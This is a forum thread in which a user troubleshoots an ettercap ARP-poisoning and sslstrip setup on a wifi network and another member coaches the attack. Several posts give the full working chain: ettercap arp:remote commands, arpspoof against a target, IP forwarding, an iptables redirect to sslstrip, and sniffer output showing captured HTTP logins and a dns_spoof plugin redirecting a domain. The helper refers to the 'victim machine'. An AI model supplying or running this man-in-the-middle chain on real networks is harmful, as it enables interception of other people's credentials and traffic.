Results 1 to 7 of 7

Thread: Ettercap not detecting hosts

  1. #1
    Junior Member
    Join Date
    Aug 2009
    Posts
    27

    Default Ettercap not detecting hosts

    I'm having trouble with ettercap, when it scans for hosts it detects the router but not me (connected via wifi) so I can't arp poison, does anyone know what to do here?

  2. #2
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default

    Is your wi-fi connected machine actually on the same subnet?
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  3. #3
    Junior Member
    Join Date
    Aug 2009
    Posts
    27

    Default Yes

    Yes they are on the same subnet, if I run via terminal with:
    sudo ettercap -T --iface ra0 -q -M arp:remote /192.168.0.1/ // ***(192.168.0.1 is router)

    then it will scan and add the router to the hosts list, and not detect my IP (192.168.0.3) but I have noticed if I use links (terminal browser) and log in to the router I get this:

    HTTP : 192.168.0.1:80 -> USER: <MYUSER> PASS: <MYPASS> INFO: (null)

    I don't get any output if I try SSl logins and I don't get any output whatsoever from firefox

  4. #4
    Junior Member
    Join Date
    May 2009
    Posts
    61

    Default

    Ettercap doesnt show your ip but if you arp poisning all hosts on subnet you can also see your surfing.

    And if you new to ettercap why dont you try ettercap with graphic this will be much easier if you new to this program.

    I prefer ettercap options from terminal if i must combine program with other tools so i dont need to have many open windows.

    Also for ssl you must uncomment lines in etter.conf and combine attack with sslstrip (nice little tool).

    Look here nice video from g0tmi1k's about attack to sniff ssl connections: http://forums.remote-exploit.org/bac...slstrip-3.html .

  5. #5
    Junior Member
    Join Date
    Aug 2009
    Posts
    27

    Default

    Quote Originally Posted by Handsome-geek View Post
    Ettercap doesnt show your ip but if you arp poisning all hosts on subnet you can also see your surfing.
    I thought this may have been the case thats why I poisoned all

    Quote Originally Posted by Handsome-geek View Post
    I prefer ettercap options from terminal if i must combine program with other tools so i dont need to have many open windows.
    Same here...


    Quote Originally Posted by Handsome-geek View Post
    Also for ssl you must uncomment lines in etter.conf and combine attack with sslstrip (nice little tool).

    Look here nice video from g0tmi1k's about attack to sniff ssl connections:
    I have already set up etter.conf and am combining with sslstrip, the parts I have changed in etter.conf are:

    ec_uid = 0
    ec_gid = 0

    # if you use iptables:
    redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"


    arpspoof redirects traffic to my MAC but only if I do not specify myself as the target. If I do I get "arpspoof: couldn't arp for host 192.168.0.3"

    This is the iptables command I am running;

    iiptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

    I run sslstrip

    I get NOTHING. Totally stumped

  6. #6
    Junior Member
    Join Date
    May 2009
    Posts
    61

    Default

    Insert this before prerouting iptables and tell me results echo 1 > /proc/sys/net/ipv4/ip_forward.

    And when you arp spoof, then 1 target is ip you are attacking and second target your gateaway try this attack with specified targets.

    Arp spoofing all hosts on gateaway is good if you have 4 or more hosts on network try first with specefied target.

    Tell results after you try. After you set ip forwading and prerouting then start sslstrip.

    If page you are visiting on vicitim machine has http and is login page who normally has https then your attack is doing fine.

  7. #7
    Junior Member
    Join Date
    Aug 2009
    Posts
    27

    Default

    Quote Originally Posted by Handsome-geek View Post
    Insert this before prerouting iptables and tell me results echo 1 > /proc/sys/net/ipv4/ip_forward.

    And when you arp spoof, then 1 target is ip you are attacking and second target your gateaway try this attack with specified targets.

    Arp spoofing all hosts on gateaway is good if you have 4 or more hosts on network try first with specefied target.

    Tell results after you try. After you set ip forwading and prerouting then start sslstrip.

    If page you are visiting on vicitim machine has http and is login page who normally has https then your attack is doing fine.
    Tried this now on ubuntu and Backtrack 4

    root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward
    root@bt:~#

    root@bt:~# arpspoof -i ra0 -t 192.168.0.2 192.168.0.1

    arpspoof: couldn't arp for host 192.168.0.2
    root@bt:~# (192.168.0.2 is now my attacking machine as its the only one available at the moment)

    root@bt:~# arpspoof -i ra0 192.168.0.1
    0:22:75:3b:e3:98 ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.0.1 is-at 0:22:75:3b:e3:98
    0:22:75:3b:e3:98 ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.0.1 is-at 0:22:75:3b:e3:98
    0:22:75:3b:e3:98 ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.0.1 is-at 0:22:75:3b:e3:98
    0:22:75:3b:e3:98 ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.0.1 is-at 0:22:75:3b:e3:98
    etc....

    root@bt:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    root@bt:~#

    root@bt:~# sslstrip -a -f -k

    Ettercap > Unified sniffing > scan hosts > 192.168.0.1 - target 2 > mitm >arp >sniff remote > start

    Listening on ra0... (Ethernet)

    ra0 -> 00:22:75:3B:E3:98 192.168.0.2 255.255.255.0

    Privileges dropped to UID 65534 GID 65534...

    28 plugins
    39 protocol dissectors
    53 ports monitored
    7587 mac vendor fingerprint
    1698 tcp OS fingerprint
    2183 known services
    Randomizing 255 hosts for scanning...
    Scanning the whole netmask for 255 hosts...
    1 hosts added to the hosts list...
    Host 192.168.0.1 added to TARGET2

    ARP poisoning victims:

    GROUP 1 : ANY (all the hosts in the list)

    GROUP 2 : 192.168.0.1 00:22:75:3B:E3:98
    Starting Unified sniffing...

    HTTP : 208.101.8.53:80 -> USER: ****** PASS: **** INFO: <A forum address>

    HTTP : 192.168.0.1:80 -> USER: ***** PASS: ***** INFO: 192.168.0.1
    HTTP : 67.15.24.40:80 -> USER: **** PASS: ***** INFO: <a forum address>
    Activating chk_poison plugin...
    chk_poison: Checking poisoning status...
    chk_poison: No poisoning at all

    I just realized I set it up for dns spoofing, which is working.
    Activating dns_spoof plugin...
    dns_spoof: wwwdot-microsoft-dotcom spoofed to [198.182.196.56]
    Unified sniffing was stopped.



    Host 192.168.0.1 added to TARGET1


    I stopped the sniff and put the router in target 1:

    no SSL but HTML logins as above

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •